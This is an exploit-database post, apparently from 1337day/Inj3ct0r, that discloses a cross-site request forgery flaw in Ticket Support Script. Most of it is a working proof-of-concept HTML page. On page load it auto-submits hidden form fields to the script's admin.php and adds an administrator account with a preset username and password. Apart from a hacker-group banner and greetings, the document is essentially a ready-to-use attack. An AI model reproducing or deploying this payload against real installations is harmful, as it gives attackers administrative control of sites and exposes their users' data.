Ticket Support Script suffers from a cross site request forgery vulnerability.
4b9852b5724f5223b2789dfa94039dead2d98080d2bef14a005dac80e8c3e6a5
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : 1337day.com 0
1 [+] Support e-mail : submit[at]1337day.com 1
0 0
1 +---------------------------------------+ 1
0 |I'm DoSs-Dz member from Inj3ct0r Team | 1
1 +---------------------------------------+ 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
+----------------------------------------------------------------------------+
# Exploit Title : Ticket Support Script Cross Site Request Forgery Add Admin
# Date : 04 April 2012
# Site for Vendor : TicketSupportScript.com
# Live Demo : http://www.phpjabbers.com/demo/tss_21/admin.php
# Big Thank to : Inj3ct0r Team & Inj3ct0r Operators "CrosS"
+----------------------------------------------------------------------------+
[!1»] Exploit P0C =»
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title> CSRF Add Admin By : DoSs-Dz </title>
</head>
<body onload="javascript:fireForms()">
<script language="JavaScript">
var pauses = new Array( "515","490","226","124","125" );
function pausecomp(millis)
{var date = new Date();
var curDate = null;
do { curDate = new Date(); }
while(curDate-date < millis);}
function fireForms()
{var count = 5;
var i=0;
for(i=0; i<count; i++){
document.forms[i].submit();
pausecomp(pauses[i]);}}
</script>
<H2> CSRF Add Admin By : DoSs-Dz </H2>
<form method="POST" name="form0" action="http://www.phpjabbers.com:80/demo/tss_21/admin.php">
<input type="hidden" name="ac" value="operators"/>
<input type="hidden" name="do" value="update_operator"/>
<input type="hidden" name="operator_name" value="khaled5"/> <------- UserName
<input type="hidden" name="user_name" value="khaled5"/> <------- UserAdmin
<input type="hidden" name="password" value="khaled5"/> <------ UserAdmin Pass
<input type="hidden" name="role" value="1"/>
</form>
</body>
</html>
+--------------------------------------------------------------------------------------------------------+
|[»] Greetz to =» [ Robert Miles ] , [ Black-ID ] , [ Abdou Abdo ] , [ Hacker Dz] , [ Damane2011 ] |
|[»] Greetz to =» [ 1337day.com ] , [ sec4ever.com ] , [ Dz4all.com ] , [ v4-team.com ] , [ Vbspiders ] |
+--------------------------------------------------------------------------------------------------------+
+------------------------------------+
|./ Gharrdaia on : 04 april 2012 |
+------------------------------------+